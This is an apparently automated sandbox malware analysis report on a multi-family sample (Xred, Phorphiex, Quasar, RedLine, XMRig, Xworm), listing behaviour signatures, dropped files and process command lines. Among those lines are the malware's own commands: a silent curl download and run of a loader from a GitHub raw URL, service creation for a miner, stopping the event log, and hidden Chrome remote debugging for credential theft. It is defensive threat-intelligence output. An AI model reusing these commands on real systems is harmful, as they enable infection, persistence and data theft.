Malware Analysis Report

2025-05-05 21:49

Sample ID 250416-h7whsatmx6
Target 4363463463464363463463463.zip.zip
SHA256 12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd
Tags
xred phorphiex quasar redline xmrig xworm dasad office04 roblox executor backdoor credential_access defense_evasion discovery execution infostealer loader miner persistence pyinstaller rat spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd

Threat Level: Known bad

The file 4363463463464363463463463.zip.zip was found to be: Known bad.

Malicious Activity Summary

Phorphiex, Phorpiex

Xred family

xmrig

Quasar payload

Quasar RAT

Quasar family

RedLine

Xred

Xworm

Phorphiex family

Detect Xworm Payload

Xworm family

Redline family

Phorphiex payload

RedLine payload

Xmrig family

XMRig Miner payload

Modifies Windows Firewall

Downloads MZ/PE file

Creates new service(s)

Uses browser remote debugging

Stops running service(s)

Executes dropped EXE

Cryptocurrency Miner

.NET Reactor protector

Adds Run key to start application

Power Settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Indicator Removal: File Deletion

Drops file in System32 directory

AutoIT Executable

UPX packed file

Launches sc.exe

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Detects Pyinstaller

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies registry class

Kills process with taskkill

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-16 07:23

Signatures

Xred family

xred

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-16 07:23

Reported

2025-04-16 07:25

Platform

win11-20250410-en

Max time kernel

5s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Xmrig family

xmrig

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

defense_evasion execution

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Cryptocurrency Miner

miner

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\._cache_Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe N/A
File opened for modification C:\Windows\SysWOW64\._cache_Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe N/A
File created C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe C:\Windows\SysWOW64\._cache_Synaptics.exe N/A
File created C:\Windows\SysWOW64\Files\XClient.exe C:\Windows\SysWOW64\._cache_Synaptics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\._cache_Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5520 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
PID 5520 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
PID 5520 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
PID 5520 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5520 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5520 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5208 wrote to memory of 5524 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5208 wrote to memory of 5524 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5208 wrote to memory of 5524 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3896 wrote to memory of 5812 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3896 wrote to memory of 5812 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3896 wrote to memory of 5812 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 5524 wrote to memory of 1520 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Windows\SysWOW64\._cache_Synaptics.exe
PID 5524 wrote to memory of 1520 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Windows\SysWOW64\._cache_Synaptics.exe
PID 5524 wrote to memory of 1520 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Windows\SysWOW64\._cache_Synaptics.exe
PID 1520 wrote to memory of 3944 N/A C:\Windows\SysWOW64\._cache_Synaptics.exe C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe
PID 1520 wrote to memory of 3944 N/A C:\Windows\SysWOW64\._cache_Synaptics.exe C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe
PID 1520 wrote to memory of 3944 N/A C:\Windows\SysWOW64\._cache_Synaptics.exe C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe
PID 3752 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe
PID 3752 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Windows\SysWOW64\._cache_Synaptics.exe

"C:\Windows\system32\._cache_Synaptics.exe"

C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe

"C:\Windows\System32\Files\fern_wifi_recon%252.34.exe"

C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Windows\SysWOW64\Files\XClient.exe

"C:\Windows\System32\Files\XClient.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Users\Admin\AppData\Local\Temp\Files\2r61ahry.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2r61ahry.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27097 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2080 -initialChannelId {501c2eff-9c35-4d52-bc8e-2a8bd757ecb0} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27133 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {b31a04cd-6cb2-4133-8b6d-1b1fa3108df6} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket

C:\Users\Admin\AppData\Local\Temp\Files\drchoe.exe

"C:\Users\Admin\AppData\Local\Temp\Files\drchoe.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3848 -prefsLen 27323 -prefMapHandle 3852 -prefMapSize 270279 -jsInitHandle 3856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3864 -initialChannelId {dd7711ec-856a-4061-a752-841d919d2e7b} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4064 -prefsLen 27323 -prefMapHandle 4068 -prefMapSize 270279 -ipcHandle 4180 -initialChannelId {1c9df6d1-9d89-4623-93a9-12f1849b8e6f} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3244 -prefsLen 34822 -prefMapHandle 3180 -prefMapSize 270279 -jsInitHandle 3232 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3108 -initialChannelId {12ea25b1-f715-479d-af43-8ccf6b0dfb2d} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4836 -prefsLen 34929 -prefMapHandle 4840 -prefMapSize 270279 -ipcHandle 4848 -initialChannelId {23b5d33b-8b73-41af-b3ca-1d5be3716478} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "VJAODQWN"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "VJAODQWN" binpath= "C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe" start= "auto"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4676 -prefsLen 32900 -prefMapHandle 3228 -prefMapSize 270279 -jsInitHandle 3220 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2604 -initialChannelId {c02d753a-e71a-4c10-b6c8-b71f20294fe1} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5324 -prefsLen 32952 -prefMapHandle 5328 -prefMapSize 270279 -jsInitHandle 5332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3228 -initialChannelId {d82145f0-2223-438a-8be2-29a640504ed3} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5540 -prefsLen 32952 -prefMapHandle 5544 -prefMapSize 270279 -jsInitHandle 5548 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5244 -initialChannelId {c9621ab9-7f9f-42e9-9e0e-66cf3356b680} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "VJAODQWN"

C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe

C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"

C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo off

C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\AppData\Local\Temp\Files\InfinityCrypt.exe

"C:\Users\Admin\AppData\Local\Temp\Files\InfinityCrypt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\mapper.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\driver.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareinj.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\injectorold.exe

C:\Windows\SysWOW64\Files\App.exe

"C:\Windows\System32\Files\App.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareogfn.dll

C:\Windows\SysWOW64\Files\App.exe

"C:\Windows\System32\Files\App.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent > nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent

C:\Windows\SysWOW64\Files\testingfile.exe

"C:\Windows\System32\Files\testingfile.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"

C:\Users\Admin\AppData\Local\Temp\Files\SQL.exe

"C:\Users\Admin\AppData\Local\Temp\Files\SQL.exe"

C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\Files\JJSPLOIT.V2.exe

"C:\Windows\System32\Files\JJSPLOIT.V2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd6cbdcf8,0x7fffd6cbdd04,0x7fffd6cbdd10

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\Temp\loader.exe

C:\Windows\Temp\loader.exe

C:\Windows\Temp\loader.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2016,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1996 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --field-trial-handle=1856,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2036 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --field-trial-handle=2124,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2352 /prefetch:13

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2928,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2940 /prefetch:1

